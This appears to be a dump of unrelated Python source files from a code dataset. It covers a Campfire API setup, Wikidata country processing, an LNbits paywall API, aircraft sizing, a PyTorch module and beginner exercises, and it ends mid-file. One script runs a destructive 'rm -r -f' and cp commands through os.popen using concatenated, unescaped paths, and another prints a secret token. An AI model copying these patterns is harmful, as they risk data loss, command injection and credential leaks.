content
stringlengths 5
1.05M
|
---|
#!/usr/bin/env python
from distutils.core import setup
from pinder import __version__
setup(
name='pinder',
version=__version__,
description='Python API for Campfire.',
license='BSD',
author='Lawrence Oluyede',
author_email='[email protected]',
url='http://dev.oluyede.org/pinder/',
download_url='http://dev.oluyede.org/download/pinder/0.6.5/',
packages=['pinder'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: Communications :: Chat',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=no-value-for-parameter
import requests
import pandas as pd
import streamlit as st
import os
import sys
PIPELINE_DIR = os.path.join(os.path.dirname(__file__), '../../', 'src/pipeline')
sys.path.append(PIPELINE_DIR)
import path_utils
################################################################################
##### Query wikidata for all ISO-3166-1 countries ######
################################################################################
# Wikidata query for ISO-3166-1 codes
# Use at https://query.wikidata.org/
# Workaround for a bug in generating urls for wikidata queries:
# Use the UI at https://query.wikidata.org/ to get the query url by entering these queries
# and then click the "Link" button -> SPARQL endpoint -> copy link address.
# This gives you the url for the query.
# SELECT DISTINCT ?country ?countryLabel ?capital ?capitalLabel
# WHERE
# {
# ?country wdt:P31 wd:Q3624078 .
# #not a former country
# FILTER NOT EXISTS {?country wdt:P31 wd:Q3024240}
# #and no an ancient civilisation (needed to exclude ancient Egypt)
# FILTER NOT EXISTS {?country wdt:P31 wd:Q28171280}
# OPTIONAL { ?country wdt:P36 ?capital } .
#
# SERVICE wikibase:label { bd:serviceParam wikibase:language "en" }
# }
# ORDER BY ?countryLabel
iso_3166_1_url = 'https://query.wikidata.org/sparql?query=%23added%20before%202016-10%0ASELECT%20DISTINCT%20%3Fcountry%20%3FcountryLabel%20%3FthreeLetterCode%20%3FnumericCode%20%3FtwoLetterCode%0AWHERE%0A%7B%0A%20%20%3Fcountry%20wdt%3AP298%20%3FthreeLetterCode.%0A%20%20%3Fcountry%20wdt%3AP299%20%3FnumericCode.%0A%20%20%3Fcountry%20wdt%3AP297%20%3FtwoLetterCode.%0A%20%20%23not%20a%20former%20country%0A%20%20FILTER%20NOT%20EXISTS%20%7B%3Fcountry%20wdt%3AP31%20wd%3AQ3024240%7D%0A%20%20%23and%20no%20an%20ancient%20civilisation%20(needed%20to%20exclude%20ancient%20Egypt)%0A%20%20FILTER%20NOT%20EXISTS%20%7B%3Fcountry%20wdt%3AP31%20wd%3AQ28171280%7D%0A%0A%20%20SERVICE%20wikibase%3Alabel%20%7B%20bd%3AserviceParam%20wikibase%3Alanguage%20%22en%22%20%7D%0A%7D%0AORDER%20BY%20%3FcountryLabel' # pylint: disable=line-too-long
countries = requests.get(iso_3166_1_url, params={'format': 'json'}).json()['results']['bindings']
country_df = pd.json_normalize(countries)
country_df = country_df.rename(columns={
'country.value': 'wikidata_id',
'twoLetterCode.value': 'country_iso_3166-1_alpha-2',
'numericCode.value': 'country_iso_3166-1_numeric',
'threeLetterCode.value': 'region_code',
'countryLabel.value': 'region_name'
})
country_df = country_df[['wikidata_id', 'country_iso_3166-1_alpha-2', 'country_iso_3166-1_numeric',
'region_code', 'region_name']]
country_df['wikidata_id'] = country_df['wikidata_id'].apply(lambda s: s.split('/')[-1])
country_df['region_code_type'] = 'iso_3166-1'
country_df['country_iso_3166-1_alpha-3'] = country_df['region_code']
country_df['region_code_level'] = 1
country_df['parent_region_code'] = 'WORLD'
country_df['subdivision_type'] = 'countries'
country_df['region_type'] = 'country'
country_df['leaf_region_code'] = country_df['region_code']
country_df['level_1_region_code'] = country_df['region_code']
country_df['level_2_region_code'] = None
country_df['level_3_region_code'] = None
st.subheader('Countries including duplicate ISO-3166-1 / ISO-3166-2 regions')
st.write(country_df)
################################################################################
##### Remove duplicates for regions that could appear as either Level 1 ######
##### or as Level 2 regions, based on whether data sources are separate ######
################################################################################
# Treat Netherlands + Aruba + Curaçao + Sint Maarten (Dutch part) as a single level 1 entity
country_df = country_df[country_df['wikidata_id'] != 'Q55']
# Keep Western Sahara wikidata entry (Q6250) instead of Q40362
country_df = country_df[country_df['wikidata_id'] != 'Q40362']
# These regions appear as both ISO-1 and ISO-2, but we will count them as ISO-2
# so we remove them from the ISO-1 list
# Leave as ISO1 because they have separate data sources: Taiwain, Hong Kong, Macao
regions_to_remove_from_iso1 = {
'ALA': 'Åland Islands', # Finland: FI-01
'BLM': 'Saint Barthélemy', # France: FR-BL Saint Barthélemy (BL)
'GUF': 'French Guiana', # France: FR-GF French Guiana (GF)
'GLP': 'Guadeloupe', # France: FR-GP Guadeloupe (GP)
'MAF': 'Saint Martin (French part)', # France: FR-MF Saint Martin (MF)
'MTQ': 'Martinique', # France: FR-MQ Martinique (MQ)
'NCL': 'New Caledonia', # France: FR-NC New Caledonia (NC)
'PYF': 'French Polynesia', # France: FR-PF French Polynesia (PF)
'SPM': 'Saint Pierre and Miquelon', # France: FR-PM Saint Pierre and Miquelon (PM)
'REU': 'Réunion', # France: FR-RE Réunion (RE)
'ATF': 'French Southern and Antarctic Lands', # France: FR-TF French Southern Territories (TF)
'WLF': 'Wallis and Futuna', # France: FR-WF Wallis and Futuna (WF)
'MYT': 'Mayotte', # France: FR-YT Mayotte (YT)
'SJM': 'Svalbard and Jan Mayen', # Norway: NO-21 Svalbard, NO-22 Jan Mayen
'BES': 'Caribbean Netherlands', # Netherlands: NL-BQ1 Bonaire (BQ), NL-BQ2 Saba (BQ), NL-BQ3 Sint Eustatius (BQ)
'ABW': 'Aruba', # Netherlands: NL-AW Aruba (AW)
'CUW': 'Curaçao', # Netherlands: NL-CW Curaçao (CW)
'SXM': 'Sint Maarten (Dutch part)', # Netherlands: NL-SX Sint Maarten (SX)
'ASM': 'American Samoa', # United States: US-AS
'GUM': 'Guam', # United States: US-GU
'MNP': 'Northern Mariana Islands', # United States: US-MP
'PRI': 'Puerto Rico', # United States: US-PR
'UMI': 'United States Minor Outlying Islands', # United States: US-UM
'VIR': 'United States Virgin Islands', # United States: US-VI
}
st.write(len(regions_to_remove_from_iso1))
country_df = country_df[~country_df['region_code'].isin(regions_to_remove_from_iso1.keys())]
st.subheader('Countries without duplicate ISO-3166-1 / ISO-3166-2 regions')
################################################################################
##### Generate datacommons ids using the known format for the dcids ######
################################################################################
country_df['datacommons_id'] = country_df.apply(lambda x: 'country/' + x['region_code'], axis=1)
st.write(country_df)
st.write(country_df.shape)
country_df.to_csv(
os.path.join(path_utils.path_to('locations_intermediate_dir'), 'iso_3166_1_locations.csv'), index=False)
|
##############################################
# The MIT License (MIT)
# Copyright (c) 2018 Kevin Walchko
# see LICENSE for full details
##############################################
# These are IntFlags, so you can compare them to ints. They
# start with 1 and go to N.
# ZmqType.pub == 1
# ZmqType.sub == 2
#
from enum import IntFlag
Status = IntFlag('Status', 'ok error topic_not_found core_not_found multiple_pub_error invalid_zmq_type')
ZmqType = IntFlag('ZmqType', 'pub sub req rep')
|
from openpyxl import Workbook, load_workbook
import os
import glob
import json
#directories
FIGRAM_PATH = '/media/mjia/Data/CNN-fMRI/FIGRIM/SCENES_700x700'
CROPPED_SUN_PATH = '/media/mjia/Data/CNN-fMRI/cropped'
TARGET_PATH = '/media/mjia/Data/CNN-fMRI/Pool'
if os.path.isdir(TARGET_PATH):
os.popen("rm -r -f" + TARGET_PATH)
os.popen("mkdir " + TARGET_PATH)
else:
os.popen("mkdir " + TARGET_PATH)
XLSX_FILE = 'RankSUNDatabase.xlsx'
#: experimental setup constants
NUMBER_OF_PARTICIPANTS = 50
NUMBER_OF_UNIQUE_RUNS = 8
NUMBER_OF_SHARED_RUNS = 1
UNIQUE_IMAGES_PER_UNIQUE_RUN = 56
SHARED_IMAGES_PER_UNIQUE_RUN = 8
SHARED_IMAGES_PER_SHARED_RUN = 64
NUMBER_REQUIRED_OF_PARTICIPANTS = NUMBER_OF_UNIQUE_RUNS * UNIQUE_IMAGES_PER_UNIQUE_RUN
#the records
global_count = 0
subject_level_count = 0
residual_count = 0
selected_classes = []
#select from Figram
for dir, subdirs, files in os.walk(FIGRAM_PATH):
for class_label in subdirs:
all_files = glob.glob('{}*.jpg'.format(FIGRAM_PATH+os.sep+class_label+os.sep), recursive=True)
# if the class contains less than 51 image, do not select it
if len(all_files) <= NUMBER_OF_PARTICIPANTS:
continue
global_count += len(all_files)
subject_level_count += len(all_files)//NUMBER_OF_PARTICIPANTS
residual_count += len(all_files)%NUMBER_OF_PARTICIPANTS
selected_classes.append(class_label)
class_label = class_label.replace(' ', '\ ')
os.popen("cp -r {0} {1}".format(FIGRAM_PATH+os.sep+class_label, TARGET_PATH))
print("add *" + class_label + "* to pool, current has " + str(global_count))
#select the class in RankSUNDatabase.xlsx
wb=load_workbook(XLSX_FILE)
first_sheet = wb.get_sheet_names()[0]
worksheet = wb.get_sheet_by_name(first_sheet)
for i in range(2, 89):
class_label = worksheet["A"+str(i)].value.lower()
#check if it's already selected
if class_label not in selected_classes:
all_files = glob.glob('{}*.jpg'.format(CROPPED_SUN_PATH + os.sep + class_label + os.sep), recursive=True)
# if the class contains less than 51 image, do not select it
if len(all_files) <= NUMBER_OF_PARTICIPANTS:
continue
global_count += len(all_files)
subject_level_count += len(all_files)//NUMBER_OF_PARTICIPANTS
residual_count += len(all_files)%NUMBER_OF_PARTICIPANTS
selected_classes.append(class_label)
class_label = class_label.replace(' ', '\ ')
os.popen("cp -r {0} {1}".format(CROPPED_SUN_PATH + os.sep + class_label, TARGET_PATH))
print("add *" + class_label + "* to pool, current has " + str(global_count))
#select the class in SUN
sorts = []
for dir, subdirs, files in os.walk(CROPPED_SUN_PATH):
for class_label in subdirs:
if class_label not in selected_classes:
all_files = glob.glob('{}*.jpg'.format(CROPPED_SUN_PATH + os.sep + class_label + os.sep), recursive=True)
if len(all_files) <= NUMBER_OF_PARTICIPANTS:
continue
sorts.append([class_label, len(all_files)])
sorts.sort(key=lambda a: a[1], reverse=True)
for iterm in sorts:
class_label = iterm[0]
length = iterm[1]
global_count += length
subject_level_count += length // NUMBER_OF_PARTICIPANTS
residual_count += length % NUMBER_OF_PARTICIPANTS
selected_classes.append(class_label)
class_label = class_label.replace(' ', '\ ')
os.popen("cp -r {0} {1}".format(CROPPED_SUN_PATH + os.sep + class_label, TARGET_PATH ))
print("add *" + class_label + "* to pool, current has " + str(global_count))
if subject_level_count >= NUMBER_REQUIRED_OF_PARTICIPANTS:
break
with open('info.json', 'w') as outfile:
json.dump(selected_classes, outfile)
print('done') |
# ---------------------------------------
# Program by Orlov.A.
#
#
# Version Date Info
# 1.0 2016 Initial Version
#
# ----------------------------------------
# x = 25
#
# if x == 25:
# print("YES, yo're right")
# else:
# print("NO!!!!!!!!!!!!!!!!!!!!!!!!")
age = 13
if (age <= 4):
print("you are baby!")
elif (age > 4) and (age <= 12):
print("you're kid!")
else:
print("you will die soon :3")
print("-------------END-----------")
cars = ['bmw', 'vw', 'seat', 'skoda', 'lada']
german_cars = ['bmw', 'vw', 'audi']
# if 'lada' in cars:
# print('omg... lada')
# else:
# print('mb will you buy some car?')
for xxx in cars:
if xxx in german_cars:
print(xxx + " is german car")
else:
print(xxx + " is not german car") |
elements = bytes([255])
print (elements[0])
|
# coding: UTF-8
import setting
TOKEN = setting.TOKEN
print(TOKEN)
## 以降ソースコード
|
# Ideal Gas Force Field
import numpy as np
class IdealGas:
def __init__(self):
pass
def __call__(self, x, *args, **kwargs):
return np.zeros_like(x) |
from http import HTTPStatus
from fastapi import Depends, Query
from starlette.exceptions import HTTPException
from lnbits.core.crud import get_user, get_wallet
from lnbits.core.services import check_invoice_status, create_invoice
from lnbits.decorators import WalletTypeInfo, get_key_type
from . import paywall_ext
from .crud import create_paywall, delete_paywall, get_paywall, get_paywalls
from .models import CheckPaywallInvoice, CreatePaywall, CreatePaywallInvoice
@paywall_ext.get("/api/v1/paywalls")
async def api_paywalls(
wallet: WalletTypeInfo = Depends(get_key_type), all_wallets: bool = Query(False)
):
wallet_ids = [wallet.wallet.id]
if all_wallets:
wallet_ids = (await get_user(wallet.wallet.user)).wallet_ids
return [paywall.dict() for paywall in await get_paywalls(wallet_ids)]
@paywall_ext.post("/api/v1/paywalls")
async def api_paywall_create(
data: CreatePaywall, wallet: WalletTypeInfo = Depends(get_key_type)
):
paywall = await create_paywall(wallet_id=wallet.wallet.id, data=data)
return paywall.dict()
@paywall_ext.delete("/api/v1/paywalls/{paywall_id}")
async def api_paywall_delete(
paywall_id, wallet: WalletTypeInfo = Depends(get_key_type)
):
paywall = await get_paywall(paywall_id)
if not paywall:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
)
if paywall.wallet != wallet.wallet.id:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Not your paywall."
)
await delete_paywall(paywall_id)
raise HTTPException(status_code=HTTPStatus.NO_CONTENT)
@paywall_ext.post("/api/v1/paywalls/invoice/{paywall_id}")
async def api_paywall_create_invoice(
data: CreatePaywallInvoice,
paywall_id: str = Query(None)
):
paywall = await get_paywall(paywall_id)
if data.amount < paywall.amount:
raise HTTPException(
status_code=HTTPStatus.BAD_REQUEST,
detail=f"Minimum amount is {paywall.amount} sat.",
)
try:
amount = data.amount if data.amount > paywall.amount else paywall.amount
payment_hash, payment_request = await create_invoice(
wallet_id=paywall.wallet,
amount=amount,
memo=f"{paywall.memo}",
extra={"tag": "paywall"},
)
except Exception as e:
raise HTTPException(status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(e))
return {"payment_hash": payment_hash, "payment_request": payment_request}
@paywall_ext.post("/api/v1/paywalls/check_invoice/{paywall_id}")
async def api_paywal_check_invoice(data: CheckPaywallInvoice, paywall_id: str = Query(None)):
paywall = await get_paywall(paywall_id)
payment_hash = data.payment_hash
if not paywall:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
)
try:
status = await check_invoice_status(paywall.wallet, payment_hash)
is_paid = not status.pending
except Exception:
return {"paid": False}
if is_paid:
wallet = await get_wallet(paywall.wallet)
payment = await wallet.get_payment(payment_hash)
await payment.set_pending(False)
return {"paid": True, "url": paywall.url, "remembers": paywall.remembers}
return {"paid": False}
|
from __future__ import division
from warnings import warn
from numpy import sqrt, exp, power, linspace, interp, log, pi
from environment import Atmosphere, G_0
MAX_T_TO_W = 5
class Mission(object):
"""
A mission as defined by a list of segments.
"""
def __init__(self, segments=None, atmosphere=None, *args, **kwargs):
self.atmosphere = Atmosphere() if atmosphere is None else atmosphere
if segments is not None:
self.segments = segments
else:
raise NotImplementedError("A mission generator has not been implemented yet, must provide list of segments.")
class Segment(object):
"""
Aircraft mission
:param kind: the type of segment, e.g., takeoff, cruise, dash, loiter, land
:param speed: the speed at which the segment is to be flown (knots)
:param altitude: the altitude at which the segment will take place (ft)
:param atmosphere: the atmosphere instance that contains the sea level conditions, if None s provided, a standard one is created
:type kind: str
:type speed: float
:type altitude: float
:type atmosphere: ::class::`Atmosphere`
If mission is of type `cruise`:
:param range: the range to fly during the segment (nmi)
:type range: float
If mission is of type `loiter`:
:param loiter_time: time to loiter (hrs)
:type loiter_time: float
"""
_DEFAULTS = dict(warmup=dict(time=60.0),
takeoff=dict(field_length= 1500,
mu=0.05,
time=3,
obstacle_height=100),
land=dict(field_length=2500,
mu=0.18,
time=3,
obstacle_height=100),
loiter=dict(time=None),
)
_WEIGHT_FRACTIONS = dict(warmup=0.99,
taxi=0.99,
takeoff=0.98,
climb=0.95,
descend=0.98,
land=0.99,
)
def __init__(self, kind, speed, altitude, payload_released=0,
atmosphere=None,
release=None, *args, **kwargs):
self.kind = kind
if 'weight_fraction' not in kwargs and kind in self._WEIGHT_FRACTIONS:
self._weight_fraction = self._WEIGHT_FRACTIONS[kind]
else:
self._weight_fraction = kwargs.pop('weight_fraction', None)
self.altitude = altitude
self.payload_released = payload_released
self.atmosphere = Atmosphere() if atmosphere is None else atmosphere
self.density = self.atmosphere.density(altitude)
self.release = release
if speed is not None:
self.speed = speed * 1.68780986 # kts to ft/s
self.mach = self.speed / self.atmosphere.speed_of_sound(altitude)
self.n = 1
if 'turn_rate' in kwargs:
turn_rate = kwargs.pop('turn_rate')
self.n = sqrt(1 + (turn_rate * self.speed / G_0) ** 2)
if 'turn_radius' in kwargs:
turn_radius = kwargs.pop('turn_radius')
n = sqrt(1 + (self.speed / turn_radius / G_0) ** 2)
if hasattr(self, 'n'):
self.n = max(n, self.n)
self.climb_rate = kwargs.pop('climb_rate', 0)
self.acceleration = kwargs.pop('acceleration', 0)
self.dynamic_pressure = 0.5 * self.density * self.speed * self.speed
for key, defaults in self._DEFAULTS.items():
if key in self.kind:
for var, default in defaults.items():
setattr(self, var, kwargs.pop(var, default))
if 'cruise' in self.kind or 'dash' in self.kind:
self.range = kwargs.pop('range')
self.time = self.range / speed
if len(kwargs) > 0:
warn("Unused kwargs: {}".format(kwargs.keys()))
@property
def weight_fraction(self):
if self._weight_fraction is not None:
return self._weight_fraction
else:
tsfc = self.aircraft.engine.tsfc(
self.mach, self.altitude, self.afterburner)
t_to_w = self.aircraft.t_to_w * \
self.aircraft.thrust_lapse(
self.altitude, self.mach) / self.prior_weight_fraction
return 1 - exp(-tsfc * t_to_w * self.time)
self.aircraft.mach = self.mach
c1, c2 = self.aircraft.engine._tsfc_coefficients
u = (self.aircraft.cd + self.aircraft.cd_r) / self.cl
return exp(-(c1 / self.mach + c2) / self.atmosphere.speed_of_sound(altitude) * ())
def thrust_to_weight_required(self, aircraft, wing_loading, prior_weight_fraction=1):
if self.speed == 0:
return [0.0] * len(wing_loading) if hasattr(wing_loading, '__iter__') else 0.0
self.aircraft = aircraft
self.prior_weight_fraction = prior_weight_fraction
self.afterburner = self.aircraft.engine.afterburner and 'dash' in self.kind
aircraft.mach = self.mach
cd_0 = aircraft.cd_0
k_1 = aircraft.k_1
k_2 = aircraft.k_2
if self.release is not None:
self.aircraft.stores = [store for store in self.aircraft.stores if store not in self.release]
alpha = aircraft.thrust_lapse(self.altitude, self.mach)
beta = self.prior_weight_fraction
cd_r = aircraft.cd_r
t_to_w = None
if 'takeoff' in self.kind:
aircraft.takeoff
k_to = aircraft.k_to
cl_max = self.aircraft.cl_max
self.aircraft.cl = cl = cl_max / (k_to * k_to)
xi = self.aircraft.cd + cd_r - self.mu * self.aircraft.cl
t_to_w = linspace(0.01, MAX_T_TO_W, 200)
a = k_to * k_to * beta * beta / (self.density * G_0 * cl_max * alpha * t_to_w)
a = - (beta / (self.density * G_0 * xi)) * log(1 - xi / ((alpha * t_to_w / beta - self.mu) * cl))
b = self.time * k_to * sqrt(2 * beta / (self.density * cl_max))
c = self.field_length
w_to_s = power((-b + sqrt(b * b + 4 * a * c)) / (2 * a), 2)
self.aircraft._takeoff = {'w_to_s': w_to_s, 't_to_w': t_to_w, 'a': a, 'b': b, 'c': c}
return interp(wing_loading, w_to_s, t_to_w)
if 'land' in self.kind:
aircraft.landing
k_td = self.aircraft.k_td
cl_max = self.aircraft.cl_max
self.aircraft.cl = cl = cl_max / (k_td * k_td)
if aircraft.reverse_thrust:
alpha = -alpha
else:
alpha = 0.0
# assume drag chute
cd_chute = 0.0
if self.aircraft.drag_chute is not None:
drag_chute_diam = self.aircraft.drag_chute['diameter']
drag_chute_cd = self.aircraft.drag_chute['cd']
try:
wing_area = self.aircraft.wing.area
except AttributeError:
wing_area = 500
warn("Could not get an area for the wing (self.aircraft.wing.area), assuming 500 sqft")
cd_chute = drag_chute_cd * 0.25 * drag_chute_diam * drag_chute_diam * pi / wing_area
xi = self.aircraft.cd + cd_r - self.mu * self.aircraft.cl + cd_chute
t_to_w = linspace(0.01, MAX_T_TO_W, 200)
a = (beta / (self.density * G_0 * xi)) * log(1 + xi / ((self.mu + (alpha / beta) * t_to_w) * cl))
b = self.time * k_td * sqrt(2 * beta / (self.density * cl_max))
c = self.field_length
w_to_s = power((-b + sqrt(b * b + 4 * a * c)) / (2 * a), 2)
self.aircraft._land = {'w_to_s': w_to_s, 't_to_w': t_to_w, 'a': a, 'b': b, 'c': c}
return interp(wing_loading, w_to_s, t_to_w)
aircraft.configuration = None
q = self.dynamic_pressure
c_l = self.n * beta * wing_loading / q
excess_power = self.climb_rate / self.speed + self.acceleration / G_0
# Master Equation from Mattingly, 2002
return (beta / alpha) * (q / (beta * wing_loading) * (k_1 * c_l * c_l + k_2 * c_l + cd_0 + cd_r) + excess_power)
|
import torch
import torch.nn as nn
from ..utils import ConvModule
from qd3dt.core import bbox_overlaps
class Relations(nn.Module):
def __init__(self,
in_channels=1024,
inter_channels=1024,
groups=16,
num_embed_convs=1,
share_embed_convs=True,
with_loc=True):
super(Relations, self).__init__()
self.in_channels = in_channels
self.groups = groups
self.inter_channels = inter_channels
assert not in_channels % groups
self.num_embed_convs = num_embed_convs
self.share_embed_convs = share_embed_convs
self.with_loc = with_loc
self.init_embed_convs()
self.conv_out = ConvModule(
self.inter_channels * self.groups,
self.in_channels,
kernel_size=1,
activation=None,
groups=self.groups)
def init_embed_convs(self):
self.embed_convs = nn.ModuleList()
if not self.share_embed_convs:
self.ref_embed_convs = nn.ModuleList()
for i in range(self.num_embed_convs):
in_channels = self.in_channels if i == 0 else self.inter_channels
self.embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False,
inplace=False))
self.embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False))
if not self.share_embed_convs:
self.ref_embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False,
inplace=False))
self.ref_embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False))
def forward(self, in_x, rois, in_ref_x=None, ref_rois=None):
# x: [N_0, C] ref_x: [N_1, C]
# rois: [N_0, 4] ref_rois: [N_1, 4]
if in_ref_x is None:
in_ref_x = in_x
ref_rois = rois
N_0, C = in_x.shape
N_1, C_1 = in_ref_x.shape
assert C == C_1
x = in_x.view(N_0, C, 1, 1)
ref_x = in_ref_x.view(N_0, C, 1, 1)
for i, embed_conv in enumerate(self.embed_convs):
x = embed_conv(x)
if not self.share_embed_convs:
ref_x = self.ref_embed_convs[i](ref_x)
else:
ref_x = embed_conv(ref_x)
# [N, G, C // G]
x = x.view(N_0, self.groups, -1)
ref_x = ref_x.view(N_1, self.groups, -1)
# [G, N_0, C // G]
x = x.permute(1, 0, 2)
# [G, C // G, N_1]
ref_x = ref_x.permute(1, 2, 0)
# [G, N_0, N_1]
matrix = torch.matmul(x, ref_x)
matrix /= x.shape[-1]**0.5
# [N_0, G, N_1]
matrix = matrix.permute(1, 0, 2)
if self.with_loc:
# [N_0, N_1]
ious = bbox_overlaps(rois[:, 1:], ref_rois[:, 1:])
ious = ious.view(N_0, 1, N_1).expand(N_0, self.groups, N_1)
matrix += torch.log(ious + 1e-6)
# [N_0, G, N_1]
matrix = matrix.softmax(dim=2)
# [N_0 * G, N_1]
matrix = matrix.view(-1, N_1)
# [N_0 * G, C] = [N_0 * G, N_1] * [N_1, C]
y = torch.matmul(matrix, in_ref_x)
# [N_0, C * G]
y = y.view(N_0, -1, 1, 1)
# [N_0, C]
y = self.conv_out(y).view(N_0, -1)
return y
|
T = int(raw_input())
for i in range (0,T):
money, item_price, exchange_wrapper = [int(x) for x in raw_input().split(' ')]
bought = money / item_price
answer = bought
wrappers = bought
while wrappers >= exchange_wrapper:
extra_items = wrappers / exchange_wrapper
answer += extra_items
wrappers = (wrappers % exchange_wrapper) + extra_items
print answer
|
"""
abc-classroom.utils
===================
"""
import os
import subprocess
import sys
import tempfile
import textwrap
from contextlib import contextmanager
from functools import lru_cache
from shutil import copystat, copy2
from IPython import get_ipython
class Error(OSError):
pass
# a copy of shutil.copytree() that is ok with the target directory
# already existing
def copytree(
src,
dst,
symlinks=False,
ignore=None,
copy_function=copy2,
ignore_dangling_symlinks=False,
):
"""Recursively copy a directory tree.
The destination directory must not already exist.
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied. If the file pointed by the symlink doesn't
exist, an exception will be added in the list of errors raised in
an Error exception at the end of the copy process.
You can set the optional ignore_dangling_symlinks flag to true if you
want to silence this exception. Notice that this has no effect on
platforms that don't support os.symlink.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
``callable(src, names) -> ignored_names``
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
The optional copy_function argument is a callable that will be used
to copy each file. It will be called with the source path and the
destination path as arguments. By default, copy2() is used, but any
function that supports the same signature (like copy()) can be used.
"""
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
os.makedirs(dst, exist_ok=True)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if os.path.islink(srcname):
linkto = os.readlink(srcname)
if symlinks:
# We can't just leave it to `copy_function` because legacy
# code with a custom `copy_function` may rely on copytree
# doing the right thing.
os.symlink(linkto, dstname)
copystat(srcname, dstname, follow_symlinks=not symlinks)
else:
# ignore dangling symlink if the flag is on
if not os.path.exists(linkto) and ignore_dangling_symlinks:
continue
# otherwise let the copy occurs. copy2 will raise an error
if os.path.isdir(srcname):
copytree(
srcname, dstname, symlinks, ignore, copy_function
)
else:
copy_function(srcname, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, ignore, copy_function)
else:
# Will raise a SpecialFileError for unsupported file types
copy_function(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error as err:
errors.extend(err.args[0])
except OSError as why:
errors.append((srcname, dstname, str(why)))
try:
copystat(src, dst)
except OSError as why:
# Copying file access times may fail on Windows
if getattr(why, "winerror", None) is None:
errors.append((src, dst, str(why)))
if errors:
raise Error(errors)
return dst
def input_editor(default_message=None):
"""Ask for user input via a text editor"""
default_message = textwrap.dedent(default_message)
with tempfile.NamedTemporaryFile(mode="r+") as tmpfile:
if default_message is not None:
tmpfile.write(default_message)
tmpfile.flush()
subprocess.check_call([get_editor(), tmpfile.name])
tmpfile.seek(0)
with open(tmpfile.name) as f:
msg = f.read()
return msg.strip()
def get_editor():
return os.environ.get("VISUAL") or os.environ.get("EDITOR") or "vi"
def _call_git(*args, directory=None):
cmd = ["git"]
cmd.extend(args)
try:
ret = subprocess.run(
cmd,
cwd=directory,
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
except subprocess.CalledProcessError as e:
err = e.stderr.decode("utf-8")
if err:
msg = err.split(":")[1].strip()
else:
msg = e.stdout.decode("utf-8")
raise RuntimeError(msg) from e
return ret
@lru_cache(1)
def TOP():
"""Path to the top level of the repository we are in"""
try:
ret = _call_git("rev-parse", "--show-toplevel")
except RuntimeError as e:
print(" ".join(e.args))
sys.exit(1)
return ret.stdout.decode("utf-8").strip()
def P(*paths):
"""Construct absolute path inside the repository from `paths`"""
path = os.path.join(*paths)
return os.path.join(TOP(), path)
def flush_inline_matplotlib_plots():
"""
Flush matplotlib plots immediately, rather than asynchronously.
Basically, the inline backend only shows the plot after the entire
cell executes, which means we can't easily use a contextmanager to
suppress displaying it. See https://github.com/jupyter-widgets/ipywidgets/issues/1181/
and https://github.com/ipython/ipython/issues/10376 for more details. This
function displays flushes any pending matplotlib plots if we are using
the inline backend.
Stolen from https://github.com/jupyter-widgets/ipywidgets/blob/4cc15e66d5e9e69dac8fc20d1eb1d7db825d7aa2/ipywidgets/widgets/interaction.py#L35
"""
if "matplotlib" not in sys.modules:
# matplotlib hasn't been imported, nothing to do.
return
try:
import matplotlib as mpl
from ipykernel.pylab.backend_inline import flush_figures
except ImportError:
return
if mpl.get_backend() == "module://ipykernel.pylab.backend_inline":
flush_figures()
@contextmanager
def hide_outputs():
"""
Context manager for hiding outputs from display() calls.
IPython handles matplotlib outputs specially, so those are supressed too.
"""
ipy = get_ipython()
if ipy is None:
# Not running inside ipython!
yield
return
old_formatters = ipy.display_formatter.formatters
ipy.display_formatter.formatters = {}
try:
yield
finally:
ipy.display_formatter.formatters = old_formatters
@contextmanager
def chdir(path):
"""Change working directory to `path` and restore old path on exit.
`path` can be `None` in which case this is a no-op.
"""
if path is None:
yield
else:
old_dir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_dir)
|
"""
Solution to an exercise from
Think Python: An Introduction to Software Design
Allen B. Downey
This program requires Gui.py, which is part of
Swampy; you can download it from thinkpython.com/swampy.
This program started with a recipe by Noah Spurrier at
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/521918
"""
import os, sys
from Gui import *
import Image as PIL # to avoid name conflict with Tkinter
import ImageTk
class ImageBrowser(Gui):
"""An image browser that scans the files in a given directory and
displays any images that can be read by PIL.
"""
def __init__(self):
Gui.__init__(self)
# clicking on the image breaks out of mainloop
